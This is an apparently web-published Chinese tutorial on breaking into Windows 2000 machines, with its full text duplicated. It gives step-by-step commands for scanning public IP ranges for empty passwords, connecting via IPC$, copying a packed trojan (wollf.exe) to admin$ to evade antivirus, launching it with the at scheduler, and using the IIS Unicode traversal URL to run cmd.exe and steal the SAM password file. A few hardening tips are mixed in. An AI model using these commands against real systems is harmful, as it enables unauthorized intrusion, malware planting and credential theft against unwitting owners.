幾種入侵方式
　　首先請安裝WIN2000系統(tǒng)，然后打開掃描軟件X-Scan2.3，再點(diǎn)擊“設(shè)置/掃描參數(shù)”，在出現(xiàn)的對話框中添入一段IP地址，如61.139.*.1－61.139.2**.255，然后點(diǎn)擊確定。繼續(xù)點(diǎn)擊“設(shè)置/掃描模塊”，勾選SQL－Server弱口令、NT-Server弱口令，點(diǎn)擊確定，再點(diǎn)擊“開始掃描”。一會(huì)兒后，X-Scan就已經(jīng)掃描完了，看看結(jié)果，有幾十臺(tái)電腦符合我們的要求。任意點(diǎn)擊一IP地址如61.193.*.100，打開追捕，查看了一下該IP的具體位置以及用戶名，做到心中有數(shù)，并查看一下該IP所開的端口以及所提供的服務(wù)，相關(guān)的步驟都可用X-Scan實(shí)現(xiàn)。收集完所有需要的信息后，就可以開始入侵了。
　　打開一個(gè)cmd窗口，輸入net use \\61.193.*.100\ipc$ “密碼” /user:”用戶名”，回車，如果出現(xiàn)命令成功完成，那我們的電腦就和對方建立了IPC連接，再次在cmd中輸入copy c:\hack\wollf.exe \\61.193.*.100\admin$,回車，這時(shí)我們就將木馬程序wollf.exe拷貝到了對方的系統(tǒng)目錄下，不過最好先加一下殼(這樣不易被病毒防火墻查殺)。下一步就是啟動(dòng)這個(gè)黑客程序，WinNT上面有Schedule(定時(shí))時(shí)務(wù)，可利用它來啟動(dòng)這個(gè)程序。首先看一下對方此時(shí)的時(shí)間，以便決定何時(shí)啟動(dòng)。輸入命令net time \\61.193.*.100，查看一下對方此時(shí)的時(shí)間，以便決定何時(shí)啟動(dòng)。輸入命令net time \\61.193.*.100，查看到對方的本地時(shí)間為23：11，那我們就用at命令來啟動(dòng)它。輸入at \\61.193.*.100 23:13 wollf.exe，等待幾分鐘，我們就可以Telnet上去了。
　　這一次黑客入侵發(fā)現(xiàn)，管理員安全意識(shí)過于薄弱，密碼竟然為空。而在我國的電腦上空口令非常多見，請現(xiàn)在還在使用空口令的用戶趕快加上密碼，密碼最好在8位以上，采用大小寫字母加字符的組合。不要以為采用了密碼就可以安全無憂了，請記住在理論上沒有攻克不了的密碼，所以一定還要定期更改密碼。還有一點(diǎn)，SQL Server安裝后將產(chǎn)生默認(rèn)的SA用戶，密碼為空，黑客可以SQL Server客戶端來進(jìn)行數(shù)據(jù)庫遠(yuǎn)程連接。如果被掃描到，那你的系統(tǒng)也就完了，它所開放的端口為1433。
　　OK，請大家再次打開X-Scan，在掃描模塊中點(diǎn)擊IIS漏洞，并設(shè)置一個(gè)C類網(wǎng)段，經(jīng)過掃描，又發(fā)現(xiàn)目標(biāo)主機(jī)。IIS的漏洞比較多，但筆者認(rèn)為比較經(jīng)典的漏洞有Unncode，不過現(xiàn)在有這種漏洞的電腦已經(jīng)比較少了，但少并不代表沒有，打開瀏覽器輸入http://IP/scripts/..% c1% 1c../winnt/system32/cmd.exe?/c dir c:/等語句試試，看見了C盤了嗎？Unncode在一般情況下是不能獲得管理員權(quán)限的，不過它可以下載SAM文件，在本地用LC4來進(jìn)行暴力破解。SAM文件保存著Windows2000的登錄名和密碼等許多有用的信息，在WinNT中它叫SAM＿，SAM文件在Windows啟動(dòng)后即被鎖定，無法更改、拷貝，但可使用它在WinNT的Repair中的備份文件。
　　防御辦法是把主目錄C:\Inetpub修改成D:\Inetpub，對于Inetput目錄中的Scripts，最好刪除或更改文件名。因?yàn)樵赟cripts目錄里可執(zhí)行.EXE文件，它可是木馬運(yùn)行的好地方?？稍?ldquo;Internet信息服務(wù)”?“默認(rèn)Web站點(diǎn)”中進(jìn)行修改，我們還可以用Iislockd這個(gè)軟件來進(jìn)行防范，它是IIS管理員們的好助手。
　　另外還有IDQ/IDA溢出，對于這個(gè)溢出，可用Snake IIS溢出管理員進(jìn)行防護(hù)。對于用漏洞進(jìn)行溢出管理員的操作，我們可以這樣防護(hù)：點(diǎn)擊“計(jì)算機(jī)管理?Internet信息服務(wù)?默認(rèn)Web站點(diǎn)”，點(diǎn)擊右鍵選擇屬性，在出現(xiàn)的Web站點(diǎn)屬性窗口中單主目錄，在出現(xiàn)的目錄中點(diǎn)擊配置，在應(yīng)用程序映射中刪除.IDQ和.IDQ，確定后也就補(bǔ)住了這個(gè)漏洞。DDoS攻擊現(xiàn)在還不是很常見，因?yàn)樗枰臈l件較高，不是每個(gè)人都可以實(shí)現(xiàn)的。
　　幾種入侵方式
　　首先請安裝WIN2000系統(tǒng)，然后打開掃描軟件X-Scan2.3，再點(diǎn)擊“設(shè)置/掃描參數(shù)”，在出現(xiàn)的對話框中添入一段IP地址，如61.139.*.1－61.139.2**.255，然后點(diǎn)擊確定。繼續(xù)點(diǎn)擊“設(shè)置/掃描模塊”，勾選SQL－Server弱口令、NT-Server弱口令，點(diǎn)擊確定，再點(diǎn)擊“開始掃描”。一會(huì)兒后，X-Scan就已經(jīng)掃描完了，看看結(jié)果，有幾十臺(tái)電腦符合我們的要求。任意點(diǎn)擊一IP地址如61.193.*.100，打開追捕，查看了一下該IP的具體位置以及用戶名，做到心中有數(shù)，并查看一下該IP所開的端口以及所提供的服務(wù)，相關(guān)的步驟都可用X-Scan實(shí)現(xiàn)。收集完所有需要的信息后，就可以開始入侵了。
　　打開一個(gè)cmd窗口，輸入net use \\61.193.*.100\ipc$ “密碼” /user:”用戶名”，回車，如果出現(xiàn)命令成功完成，那我們的電腦就和對方建立了IPC連接，再次在cmd中輸入copy c:\hack\wollf.exe \\61.193.*.100\admin$,回車，這時(shí)我們就將木馬程序wollf.exe拷貝到了對方的系統(tǒng)目錄下，不過最好先加一下殼(這樣不易被病毒防火墻查殺)。下一步就是啟動(dòng)這個(gè)黑客程序，WinNT上面有Schedule(定時(shí))時(shí)務(wù)，可利用它來啟動(dòng)這個(gè)程序。首先看一下對方此時(shí)的時(shí)間，以便決定何時(shí)啟動(dòng)。輸入命令net time \\61.193.*.100，查看一下對方此時(shí)的時(shí)間，以便決定何時(shí)啟動(dòng)。輸入命令net time \\61.193.*.100，查看到對方的本地時(shí)間為23：11，那我們就用at命令來啟動(dòng)它。輸入at \\61.193.*.100 23:13 wollf.exe，等待幾分鐘，我們就可以Telnet上去了。
　　這一次黑客入侵發(fā)現(xiàn)，管理員安全意識(shí)過于薄弱，密碼竟然為空。而在我國的電腦上空口令非常多見，請現(xiàn)在還在使用空口令的用戶趕快加上密碼，密碼最好在8位以上，采用大小寫字母加字符的組合。不要以為采用了密碼就可以安全無憂了，請記住在理論上沒有攻克不了的密碼，所以一定還要定期更改密碼。還有一點(diǎn)，SQL Server安裝后將產(chǎn)生默認(rèn)的SA用戶，密碼為空，黑客可以SQL Server客戶端來進(jìn)行數(shù)據(jù)庫遠(yuǎn)程連接。如果被掃描到，那你的系統(tǒng)也就完了，它所開放的端口為1433。
　　OK，請大家再次打開X-Scan，在掃描模塊中點(diǎn)擊IIS漏洞，并設(shè)置一個(gè)C類網(wǎng)段，經(jīng)過掃描，又發(fā)現(xiàn)目標(biāo)主機(jī)。IIS的漏洞比較多，但筆者認(rèn)為比較經(jīng)典的漏洞有Unncode，不過現(xiàn)在有這種漏洞的電腦已經(jīng)比較少了，但少并不代表沒有，打開瀏覽器輸入http://IP/scripts/..% c1% 1c../winnt/system32/cmd.exe?/c dir c:/等語句試試，看見了C盤了嗎？Unncode在一般情況下是不能獲得管理員權(quán)限的，不過它可以下載SAM文件，在本地用LC4來進(jìn)行暴力破解。SAM文件保存著Windows2000的登錄名和密碼等許多有用的信息，在WinNT中它叫SAM＿，SAM文件在Windows啟動(dòng)后即被鎖定，無法更改、拷貝，但可使用它在WinNT的Repair中的備份文件。
　　防御辦法是把主目錄C:\Inetpub修改成D:\Inetpub，對于Inetput目錄中的Scripts，最好刪除或更改文件名。因?yàn)樵赟cripts目錄里可執(zhí)行.EXE文件，它可是木馬運(yùn)行的好地方?？稍?ldquo;Internet信息服務(wù)”?“默認(rèn)Web站點(diǎn)”中進(jìn)行修改，我們還可以用Iislockd這個(gè)軟件來進(jìn)行防范，它是IIS管理員們的好助手。
　　另外還有IDQ/IDA溢出，對于這個(gè)溢出，可用Snake IIS溢出管理員進(jìn)行防護(hù)。對于用漏洞進(jìn)行溢出管理員的操作，我們可以這樣防護(hù)：點(diǎn)擊“計(jì)算機(jī)管理?Internet信息服務(wù)?默認(rèn)Web站點(diǎn)”，點(diǎn)擊右鍵選擇屬性，在出現(xiàn)的Web站點(diǎn)屬性窗口中單主目錄，在出現(xiàn)的目錄中點(diǎn)擊配置，在應(yīng)用程序映射中刪除.IDQ和.IDQ，確定后也就補(bǔ)住了這個(gè)漏洞。DDoS攻擊現(xiàn)在還不是很常見，因?yàn)樗枰臈l件較高，不是每個(gè)人都可以實(shí)現(xiàn)的。

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。